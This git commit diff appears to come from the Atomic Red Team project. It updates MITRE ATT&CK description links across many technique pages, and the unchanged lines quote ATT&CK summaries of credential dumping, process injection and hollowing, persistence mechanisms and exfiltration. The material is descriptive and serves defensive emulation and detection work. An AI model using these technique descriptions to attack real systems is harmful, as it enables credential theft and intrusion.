Generate docs from job=validate_atomics_generate_docs branch=master

2020-09-29 13:53:28 +00:00
parent 6870ca31c1
commit 910a2a764a
186 changed files with 186 additions and 186 deletions
@@ -1,5 +1,5 @@
 # T1003.001 - LSASS Memory
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/001)
 <blockquote>Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).

 As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
@@ -1,5 +1,5 @@
 # T1003.002 - Security Account Manager
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003.002)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/002)
 <blockquote>Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.

 A number of tools can be used to retrieve the SAM file through in-memory techniques:
@@ -1,5 +1,5 @@
 # T1003.003 - NTDS
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003.003)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/003)
 <blockquote>Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)

 In addition to looking NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
@@ -1,5 +1,5 @@
 # T1003.004 - LSA Secrets
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003.004)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/004)
 <blockquote>Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)

 [Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)</blockquote>
@@ -1,5 +1,5 @@
 # T1003 - OS Credential Dumping
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003)
 <blockquote>Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.

 Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
@@ -1,5 +1,5 @@
 # T1007 - System Service Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1007)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1007)
 <blockquote>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</blockquote>

 ## Atomic Tests
@@ -1,5 +1,5 @@
 # T1010 - Application Window Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1010)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1010)
 <blockquote>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.</blockquote>

 ## Atomic Tests
@@ -1,5 +1,5 @@
 # T1012 - Query Registry
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1012)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1012)
 <blockquote>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.

 The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</blockquote>
@@ -1,5 +1,5 @@
 # T1014 - Rootkit
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1014)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1014)
 <blockquote>Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) 

 Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)</blockquote>
@@ -1,5 +1,5 @@
 # T1016 - System Network Configuration Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1016)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016)
 <blockquote>Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).

 Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</blockquote>
@@ -1,5 +1,5 @@
 # T1018 - Remote System Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1018)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1018)
 <blockquote>Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as  [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) in order to discover the hostname to IP address mappings of remote systems. 

 Specific to macOS, the <code>bonjour</code> protocol exists to discover additional Mac-based systems within the same broadcast domain.
@@ -1,5 +1,5 @@
 # T1020 - Automated Exfiltration
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1020)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1020)
 <blockquote>Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. 

 When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</blockquote>
@@ -1,5 +1,5 @@
 # T1021.001 - Remote Desktop Protocol
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1021.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/001)
 <blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

 Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) 
@@ -1,5 +1,5 @@
 # T1021.002 - SMB/Windows Admin Shares
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1021.002)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/002)
 <blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

 SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
@@ -1,5 +1,5 @@
 # T1021.003 - Distributed Component Object Model
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1021.003)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/003)
 <blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.

 The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
@@ -1,5 +1,5 @@
 # T1021.006 - Windows Remote Management
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1021.006)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/006)
 <blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

 WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)</blockquote>
@@ -1,5 +1,5 @@
 # T1027.001 - Binary Padding
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1027.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/001)
 <blockquote>Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. 

 Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) </blockquote>
@@ -1,5 +1,5 @@
 # T1027.002 - Software Packing
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1027.002)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/002)
 <blockquote>Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) 

 Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.  </blockquote>
@@ -1,5 +1,5 @@
 # T1027.004 - Compile After Delivery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1027.004)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/004)
 <blockquote>Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)

 Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)</blockquote>
@@ -1,5 +1,5 @@
 # T1027 - Obfuscated Files or Information
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1027)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027)
 <blockquote>Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. 

 Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as JavaScript. 
@@ -1,5 +1,5 @@
 # T1030 - Data Transfer Size Limits
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1030)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1030)
 <blockquote>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</blockquote>

 ## Atomic Tests
@@ -1,5 +1,5 @@
 # T1033 - System Owner/User Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1033)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1033)
 <blockquote>Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

 Utilities and commands that acquire this information include <code>whoami</code>. In Mac and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>.</blockquote>
@@ -1,5 +1,5 @@
 # T1036.003 - Rename System Utilities
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1036.003)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/003)
 <blockquote>Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>). (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</blockquote>

 ## Atomic Tests
@@ -1,5 +1,5 @@
 # T1036.006 - Space after Filename
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1036.006)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/006)
 <blockquote>Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.

 For example, if there is a Mach-O executable file called <code>evil.bin</code>, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to <code>evil.txt</code>, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to <code>evil.txt </code> (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).
@@ -1,5 +1,5 @@
 # T1037.001 - Logon Script (Windows)
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1037.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/001)
 <blockquote>Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key.(Citation: Hexacorn Logon Scripts)

 Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. </blockquote>
@@ -1,5 +1,5 @@
 # T1037.002 - Logon Script (Mac)
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1037.002)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/002)
 <blockquote>Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user.(Citation: creating login hook)

 Adversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary. </blockquote>
@@ -1,5 +1,5 @@
 # T1037.004 - Rc.common
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1037.004)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/004)
 <blockquote>Adversaries may use rc.common automatically executed at boot initialization to establish persistence. During the boot process, macOS executes <code>source /etc/rc.common</code>, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated mechanism in favor of [Launch Agent](https://attack.mitre.org/techniques/T1543/001) and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) but is currently still used.

 Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user. (Citation: Methods of Mac Malware Persistence)</blockquote>
@@ -1,5 +1,5 @@
 # T1037.005 - Startup Items
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1037.005)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/005)
 <blockquote>Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items)

 This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, <code>/Library/StartupItems</code> isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory. 
@@ -1,5 +1,5 @@
 # T1040 - Network Sniffing
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1040)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1040)
 <blockquote>Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

 Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
@@ -1,5 +1,5 @@
 # T1046 - Network Service Scanning
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1046)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1046)
 <blockquote>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. 

 Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.</blockquote>
@@ -1,5 +1,5 @@
 # T1047 - Windows Management Instrumentation
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1047)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1047)
 <blockquote>Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)

 An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)</blockquote>
@@ -1,5 +1,5 @@
 # T1048.003 - Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1048.003)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1048/003)
 <blockquote>Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 

 Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. </blockquote>
@@ -1,5 +1,5 @@
 # T1048 - Exfiltration Over Alternative Protocol
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1048)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1048)
 <blockquote>Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.  

 Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. 
@@ -1,5 +1,5 @@
 # T1049 - System Network Connections Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1049)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1049)
 <blockquote>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 

 An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview)
@@ -1,5 +1,5 @@
 # T1053.001 - At (Linux)
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1053.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1053/001)
 <blockquote>Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)

 An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.</blockquote>
@@ -1,5 +1,5 @@
 # T1053.002 - At (Windows)
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1053.002)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1053/002)
 <blockquote>Adversaries may abuse the <code>at.exe</code> utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. 

 An adversary may use <code>at.exe</code> in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).
@@ -1,5 +1,5 @@
 # T1053.003 - Cron
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1053.003)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1053/003)
 <blockquote>Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code. The <code>cron</code> utility is a time-based job scheduler for Unix-like operating systems.  The <code> crontab</code> file contains the schedule of cron entries to be run and the specified times for execution. Any <code>crontab</code> files are stored in operating system-specific file paths.

 An adversary may use <code>cron</code> in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. <code>cron</code> can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.</blockquote>
@@ -1,5 +1,5 @@
 # T1053.004 - Launchd
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1053.004)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1053/004)
 <blockquote>Adversaries may abuse the <code>Launchd</code> daemon to perform task scheduling for initial or recurring execution of malicious code. The <code>launchd</code> daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in <code>/System/Library/LaunchDaemons</code> and <code>/Library/LaunchDaemons</code> (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).

 An adversary may use the <code>launchd</code> daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. <code>launchd</code> can also be abused to run a process under the context of a specified account. Daemons, such as <code>launchd</code>, run with the permissions of the root user account, and will operate regardless of which user account is logged in.</blockquote>
@@ -1,5 +1,5 @@
 # T1053.005 - Scheduled Task
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1053.005)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1053/005)
 <blockquote>Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The <code>schtasks</code> can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.

 The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though <code>at.exe</code> can not access tasks created with <code>schtasks</code> or the Control Panel.
@@ -1,5 +1,5 @@
 # T1055.004 - Asynchronous Procedure Call
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1055.004)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1055/004)
 <blockquote>Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. 

 APC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point <code>QueueUserAPC</code> can be used to invoke a function (such as <code>LoadLibrayA</code> pointing to a malicious DLL). 
@@ -1,5 +1,5 @@
 # T1055.012 - Process Hollowing
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1055.012)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1055/012)
 <blockquote>Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  

 Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as <code>CreateProcess</code>, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as <code>ZwUnmapViewOfSection</code> or <code>NtUnmapViewOfSection</code>  before being written to, realigned to the injected code, and resumed via <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.(Citation: Leitch Hollowing)(Citation: Endgame Process Injection July 2017)
@@ -1,5 +1,5 @@
 # T1055 - Process Injection
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1055)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1055)
 <blockquote>Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. 

 There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. 
@@ -1,5 +1,5 @@
 # T1056.001 - Keylogging
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1056.001)
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1056/001)
 <blockquote>Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.

